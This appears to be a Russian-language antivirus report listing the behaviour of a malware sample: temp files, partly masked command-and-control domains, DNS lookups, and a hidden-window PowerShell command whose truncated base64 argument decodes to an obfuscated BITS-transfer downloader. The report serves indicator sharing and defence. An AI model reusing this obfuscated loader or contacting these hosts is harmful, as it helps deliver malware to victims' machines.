Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...
- %WINDIR%\temp\cab60fa.tmp
- %WINDIR%\temp\tar60fb.tmp
- %WINDIR%\temp\cab76e5.tmp
- %WINDIR%\temp\tar76e6.tmp
- %WINDIR%\temp\cab77f1.tmp
- %WINDIR%\temp\tar77f2.tmp
- %WINDIR%\temp\cab8d31.tmp
- %WINDIR%\temp\tar8d32.tmp
- %WINDIR%\temp\cab60fa.tmp
- %WINDIR%\temp\tar60fb.tmp
- %WINDIR%\temp\cab76e5.tmp
- %WINDIR%\temp\tar76e6.tmp
- %WINDIR%\temp\cab77f1.tmp
- %WINDIR%\temp\tar77f2.tmp
- %WINDIR%\temp\cab8d31.tmp
- %WINDIR%\temp\tar8d32.tmp
- 'sh####nfoways.com':80
- 'te###.cxyw.net':80
- 'su########eandorganicgarments.com':80
- 'st####g.icuskin.com':80
- http://cr#.#ectigo.com/SectigoRSADomainValidationSecureServerCA.crt
- DNS ASK ra####kaonline.com
- DNS ASK cr#.#ectigo.com
- DNS ASK sh####nfoways.com
- DNS ASK te###.cxyw.net
- DNS ASK su########eandorganicgarments.com
- DNS ASK st####g.icuskin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...' (со скрытым окном)